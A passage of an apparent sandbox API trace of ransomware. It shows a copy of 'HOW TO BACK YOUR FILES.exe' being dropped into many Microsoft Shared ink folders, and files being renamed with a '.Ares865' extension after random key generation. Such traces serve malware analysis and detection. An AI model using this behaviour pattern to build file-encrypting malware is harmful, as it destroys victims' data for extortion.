"c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.874] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f51c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f51c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.875] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV" [0076.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1e88 | out: hHeap=0x2b0000) returned 1 [0076.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0076.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned 56 [0076.875] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV" [0076.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.881] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f542b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f542b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.881] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.881] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT" [0076.881] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1e08 | out: hHeap=0x2b0000) returned 1 [0076.881] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0076.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned 56 [0076.881] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT" [0076.881] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.885] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.885] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f542b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f542b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.886] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.886] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.886] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR" [0076.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1d88 | out: hHeap=0x2b0000) returned 1 [0076.886] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0076.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned 56 [0076.886] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR" [0076.886] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.886] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.894] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.894] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f568ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f568ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.894] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.894] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.894] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP" [0076.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1d08 | out: hHeap=0x2b0000) returned 1 [0076.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0076.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned 56 [0076.894] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP" [0076.894] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.894] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.898] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f568ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f568ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.899] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT" [0076.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1c88 | out: hHeap=0x2b0000) returned 1 [0076.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0076.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned 56 [0076.899] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT" [0076.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.899] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.908] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.908] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f568ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f568ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.909] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.909] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization" [0076.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0076.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0076.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 67 [0076.909] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization" [0076.909] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.909] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.913] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.913] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5f58ee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f58ee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.914] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.914] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.914] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" [0076.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1c08 | out: hHeap=0x2b0000) returned 1 [0076.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0076.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 56 [0076.914] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" [0076.914] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.914] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.933] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.933] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f5b4f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f5b4f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.933] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.933] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.934] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" [0076.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1b88 | out: hHeap=0x2b0000) returned 1 [0076.934] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0076.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 56 [0076.934] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" [0076.934] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.934] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.947] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.947] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f5db0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f5db0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.947] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.947] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.947] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" [0076.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1b08 | out: hHeap=0x2b0000) returned 1 [0076.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0076.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 56 [0076.948] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" [0076.948] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.948] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.952] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.952] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f5db0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f5db0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.952] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" [0076.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0076.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0076.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 64 [0076.952] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" [0076.952] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.952] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.967] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.967] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f601220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f601220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.967] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.967] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.967] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.Ares865") returned 83 [0076.967] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.ares865"), dwFlags=0x1) returned 1 [0076.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=212) returned 1 [0076.970] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0076.971] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.971] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.976] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0076.976] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.976] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0076.977] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.Ares865") returned 83 [0076.977] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.Ares865" (normalized: 